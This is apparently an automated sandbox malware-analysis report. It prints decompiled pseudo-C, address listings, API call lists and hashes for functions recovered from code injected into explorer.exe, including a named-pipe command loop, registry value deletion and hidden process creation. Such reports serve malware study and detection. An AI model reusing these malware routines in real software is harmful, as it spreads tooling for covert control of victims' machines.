                  0x0008522b
                  0x0008522d
                  0x00085233
                  0x00085233
                  0x00085240
                  0x00085246
                  0x0008524c
                  0x00085251
                  0x0008526f
                  0x00085271
                  0x0008527d
                  0x0008527d
                  0x00085283
                  0x00085285
                  0x0008528b
                  0x0008529d
                  0x000852a3
                  0x000852af
                  0x000852b7
                  0x000852b7
                  0x000852b7
                  0x000852b9
                  0x000852bf
                  0x000852bf
                  0x00084eef
                  0x00084ef2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00084ef2
                  0x00084ed9
                  0x00084e1d
                  0x00084e1d
                  0x00000000
                  0x00084e1d
                  0x00084d9b
                  0x00084da2
                  0x00084dab
                  0x00084dad
                  0x00084db3
                  0x00084dc4
                  0x00084dcd
                  0x00084dcd
                  0x00084dd9
                  0x00084de2
                  0x00084de7
                  0x00084dec
                  0x00000000
                  0x00000000
                  0x00084dec

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                  • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                  • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
                  • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                  • Opcode Fuzzy Hash: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
                  • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189pipeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 364 832a1-832b4 365 832b7-832ce ConnectNamedPipe 364->365 366 832d0-832db GetLastError 365->366 367 832e1-83304 365->367 366->367 368 834c2-834c8 366->368 370 834a8 GetLastError 367->370 371 8330a-8330e 367->371 372 834ae-834bc DisconnectNamedPipe 370->372 371->370 373 83314-83320 371->373 372->365 372->368 374 833b8-833d1 call 893be 373->374 375 83326-83329 373->375 387 83476-8349b call 896ca 374->387 388 833d7-833dd 374->388 376 8332b-8332f 375->376 377 83397-833b3 call 8c319 375->377 379 8337b-83384 call 8f79f 376->379 380 83331-83334 376->380 377->372 399 83358-8335b 379->399 384 83365-83369 call 8f79f 380->384 385 83336-83339 380->385 396 8336e-83376 384->396 393 8333b-8333e 385->393 394 8334f-83353 call 8f7c1 385->394 403 8349d-834a6 call 8c319 387->403 390 833df-833f6 call 88604 388->390 391 83454-8346f call 89749 call 81da0 388->391 409 833f8-833fd 390->409 410 83471 390->410 391->387 393->372 400 83344-8334d call 8f7c1 393->400 394->399 396->403 407 8335d-83363 399->407 408 83386-83388 399->408 400->396 403->372 412 8338a-83392 call 8c319 407->412 408->412 415 8342a-83452 call 89749 call 81da0 call 894b7 409->415 416 833ff-83402 409->416 419 83473 410->419 412->372 415->419 421 83404-83425 call 8c379 call 891a6 416->421 419->387 433 83427 421->433 433->415
                  C-Code - Quality: 54%
                  			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0x40f8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x1430020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x1430020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}




































                  0x000832ac
                  0x000832ae
                  0x000832b0
                  0x000832b4
                  0x000832b7
                  0x000832c3
                  0x000832ce
                  0x00000000
                  0x00000000
                  0x000832e1
                  0x000832e5
                  0x000832e6
                  0x000832eb
                  0x000832f0
                  0x000832f6
                  0x00083304
                  0x000834a8
                  0x00083314
                  0x00083314
                  0x0008331d
                  0x00083320
                  0x000833c8
                  0x000833ca
                  0x000833d1
                  0x000833d7
                  0x000833dd
                  0x00083456
                  0x00083461
                  0x00083466
                  0x00083469
                  0x000833df
                  0x000833e2
                  0x000833ee
                  0x000833f0
                  0x000833f6
                  0x00083471
                  0x000833f8
                  0x000833fd
                  0x000833ff
                  0x00083402
                  0x00083404
                  0x00083412
                  0x00083417
                  0x0008341a
                  0x0008341b
                  0x00083420
                  0x00083423
                  0x00083427
                  0x00083427
                  0x0008342c
                  0x00083439
                  0x0008343e
                  0x00083441
                  0x0008344d
                  0x0008344d
                  0x00083473
                  0x00083473
                  0x000833dd
                  0x00083476
                  0x0008348a
                  0x0008348f
                  0x0008349a
                  0x0008349b
                  0x00000000
                  0x00083326
                  0x00083326
                  0x00083329
                  0x00083397
                  0x00083398
                  0x0008339b
                  0x0008339c
                  0x000833a3
                  0x000833ae
                  0x000833b0
                  0x0008332b
                  0x0008332c
                  0x0008332f
                  0x0008337f
                  0x00000000
                  0x00083331
                  0x00083331
                  0x00083334
                  0x00083369
                  0x00000000
                  0x00083336
                  0x00083336
                  0x00083339
                  0x00083353
                  0x00083358
                  0x0008335b
                  0x00083386
                  0x00083387
                  0x00083388
                  0x0008335d
                  0x0008335d
                  0x00083360
                  0x00083361
                  0x00083361
                  0x0008338a
                  0x0008338b
                  0x0008333b
                  0x0008333e
                  0x00083348
                  0x0008336e
                  0x0008336e
                  0x00083373
                  0x00083374
                  0x0008349d
                  0x0008349d
                  0x0008349e
                  0x000834a3
                  0x000834a3
                  0x0008333e
                  0x00083339
                  0x00083334
                  0x0008332f
                  0x00083329
                  0x00083320
                  0x000834b4
                  0x000834bc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x000834bc
                  0x000834c8

                  APIs
                  • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                  • GetLastError.KERNEL32 ref: 000832D0
                    • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001F8), ref: 0008C35F
                  • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                  • String ID:
                  • API String ID: 2389948835-0
                  • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                  • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                  • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                  • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000861B4, Relevance: 6.1, APIs: 4, Instructions: 145registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 434 861b4-861f9 memset call 88604 437 861ff-86211 call 88604 434->437 438 86363-86369 434->438 437->438 441 86217-86234 RegOpenKeyExW 437->441 442 8623a-8626d 441->442 443 86333-86337 441->443 448 8627f-86284 442->448 449 8626f-8627a 442->449 444 86339-8633e 443->444 445 86344-86360 call 8861a * 2 443->445 444->445 445->438 448->443 451 8628a 448->451 449->443 454 8628d-862dc memset * 2 451->454 457 862de-862ee 454->457 458 86326-8632d 454->458 460 862f0-86304 457->460 461 86323 457->461 458->443 458->454 460->461 463 86306-86313 call 8c392 460->463 461->458 466 8631c-8631e call 8b1b1 463->466 467 86315-86317 463->467 466->461 467->466
                  C-Code - Quality: 80%
                  			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E00088604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0x40fab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E0008861A( &_v32, 0x3fff);
					E0008861A( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x40fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x40fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x40fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x40fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x40fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































                  0x000861b4
                  0x000861b4
                  0x000861c0
                  0x000861cf
                  0x000861d2
                  0x000861dc
                  0x000861e4
                  0x000861e7
                  0x000861ef
                  0x000861f1
                  0x000861f4
                  0x000861f9
                  0x00086365
                  0x00086369
                  0x00086369
                  0x00086209
                  0x0008620b
                  0x00086211
                  0x00000000
                  0x00000000
                  0x00086234
                  0x00086333
                  0x00086337
                  0x00086339
                  0x00086341
                  0x00086341
                  0x0008634d
                  0x0008635b
                  0x00000000
                  0x00086360
                  0x0008623d
                  0x00086241
                  0x00086245
                  0x00086249
                  0x0008624d
                  0x0008624e
                  0x0008624f
                  0x00086250
                  0x00086251
                  0x00086255
                  0x0008625c
                  0x0008625d
                  0x00086262
                  0x0008626d
                  0x00086282
                  0x00086284
                  0x00000000
                  0x00000000
                  0x0008628a
                  0x0008628d
                  0x00086295
                  0x000862a2
                  0x000862a7
                  0x000862aa
                  0x000862b3
                  0x000862ba
                  0x000862ca
                  0x000862d4
                  0x000862da
                  0x000862dc
                  0x000862e1
                  0x000862ea
                  0x000862ec
                  0x000862ee
                  0x000862f0
                  0x000862fa
                  0x00086300
                  0x00086304
                  0x00086308
                  0x0008630d
                  0x00086313
                  0x00086315
                  0x00086317
                  0x00086317
                  0x0008631e
                  0x0008631e
                  0x00086304
                  0x00086323
                  0x00086323
                  0x00086326
                  0x00086327
                  0x0008632a
                  0x0008632a
                  0x00000000
                  0x0008628d
                  0x0008626f
                  0x00086277
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 000861D2
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                  • memset.MSVCRT ref: 00086295
                  • memset.MSVCRT ref: 000862A2
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$AllocateHeapOpen
                  • String ID:
                  • API String ID: 2508404634-0
                  • Opcode ID: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
                  • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                  • Opcode Fuzzy Hash: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
                  • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A911, Relevance: 6.1, APIs: 4, Instructions: 74processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 469 8a911-8a941 memset 470 8a94c-8a971 CreateProcessW 469->470 471 8a943-8a948 469->471 472 8a9ae 470->472 473 8a973-8a976 470->473 471->470 474 8a9b0-8a9b6 472->474 475 8a978-8a988 473->475 476 8a996-8a9a6 CloseHandle 473->476 475->476 479 8a98a-8a990 GetExitCodeProcess 475->479 477 8a9ac 476->477 477->474 479->476
                  C-Code - Quality: 65%
                  			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0x40f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					CloseHandle(_v20.hThread);
					_t32 =  *0x9e684; // 0x40f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}










                  0x0008a91c
                  0x0008a925
                  0x0008a92c
                  0x0008a934
                  0x0008a938
                  0x0008a939
                  0x0008a93a
                  0x0008a93b
                  0x0008a93c
                  0x0008a941
                  0x0008a945
                  0x0008a948
                  0x0008a948
                  0x0008a955
                  0x0008a971
                  0x0008a9ae
                  0x0008a973
                  0x0008a976
                  0x0008a978
                  0x0008a97b
                  0x0008a980
                  0x0008a988
                  0x0008a990
                  0x0008a990
                  0x0008a988
                  0x0008a99e
                  0x0008a9a1
                  0x0008a9a9
                  0x0008a9a9
                  0x0008a9b6

                  APIs
                  • memset.MSVCRT ref: 0008A925
                  • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                  • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
                  • CloseHandle.KERNELBASE(?), ref: 0008A99E
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Process$CloseCodeCreateExitHandlememset
                  • String ID:
                  • API String ID: 2668540068-0
                  • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                  • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 480 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 483 8b07c-8b07e 480->483 484 8b0ab-8b0dd call 8c392 lstrcpynW 483->484 485 8b080-8b094 call 8bb8d 483->485 485->484 489 8b096-8b0a7 485->489 489->484
                  C-Code - Quality: 87%
                  			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0x40fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0x40fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0x40fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0x40f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}
















                  0x0008b012
                  0x0008b023
                  0x0008b035
                  0x0008b037
                  0x0008b045
                  0x0008b054
                  0x0008b05f
                  0x0008b067
                  0x0008b074
                  0x0008b07a
                  0x0008b07e
                  0x0008b080
                  0x0008b094
                  0x0008b09d
                  0x0008b0a8
                  0x0008b0a8
                  0x0008b094
                  0x0008b0ab
                  0x0008b0b2
                  0x0008b0d0
                  0x0008b0dd

                  APIs
                  • memset.MSVCRT ref: 0008B037
                  • memset.MSVCRT ref: 0008B045
                  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                    • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                    • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                    • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                  • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                  • String ID:
                  • API String ID: 3158470084-0
                  • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                  • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 492 8bf37-8bf66 RegOpenKeyExW 493 8bf68-8bf6a 492->493 494 8bf6c-8bf8a RegQueryValueExW 492->494 495 8bfda-8bfdc 493->495 496 8bf8c-8bf9c call 88604 494->496 497 8bfc7-8bfca 494->497 496->497 503 8bf9e-8bfb8 RegQueryValueExW 496->503 499 8bfcc-8bfd1 497->499 500 8bfd7 497->500 499->500 501 8bfd9 500->501 501->495 504 8bfba-8bfc6 call 8861a 503->504 505 8bfdd-8bfea RegCloseKey 503->505 504->497 505->501
                  C-Code - Quality: 100%
                  			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0x40fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










                  0x0008bf55
                  0x0008bf58
                  0x0008bf5b
                  0x0008bf66
                  0x0008bf8a
                  0x0008bfc7
                  0x0008bfca
                  0x0008bfcc
                  0x0008bfd4
                  0x0008bfd4
                  0x0008bfd7
                  0x0008bfd9
                  0x00000000
                  0x0008bfd9
                  0x0008bf94
                  0x0008bf96
                  0x0008bf9c
                  0x00000000
                  0x00000000
                  0x0008bfb8
                  0x0008bfe5
                  0x0008bfe8
                  0x00000000
                  0x0008bfe8
                  0x0008bfc0
                  0x00000000
                  0x0008bfc6
                  0x00000000

                  APIs
                  • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                  • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
                  • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                  • Opcode Fuzzy Hash: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
                  • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 508 8be9b-8bec3 RegOpenKeyExA 509 8bec9-8bee6 RegQueryValueExA 508->509 510 8bec5-8bec7 508->510 512 8bee8-8bef7 call 88604 509->512 513 8bf21-8bf24 509->513 511 8bf33-8bf36 510->511 512->513 518 8bef9-8bf13 RegQueryValueExA 512->518 514 8bf31 513->514 515 8bf26-8bf2e RegCloseKey 513->515 514->511 515->514 518->513 519 8bf15-8bf1a 518->519 519->513 520 8bf1c-8bf1f 519->520 520->513
                  C-Code - Quality: 100%
                  			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E00088604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}








                  0x0008beae
                  0x0008beb8
                  0x0008bebb
                  0x0008bec3
                  0x00000000
                  0x0008bec5
                  0x0008becc
                  0x0008bee6
                  0x0008bef2
                  0x0008bef7
                  0x0008bf15
                  0x0008bf1a
                  0x0008bf1f
                  0x0008bf1f
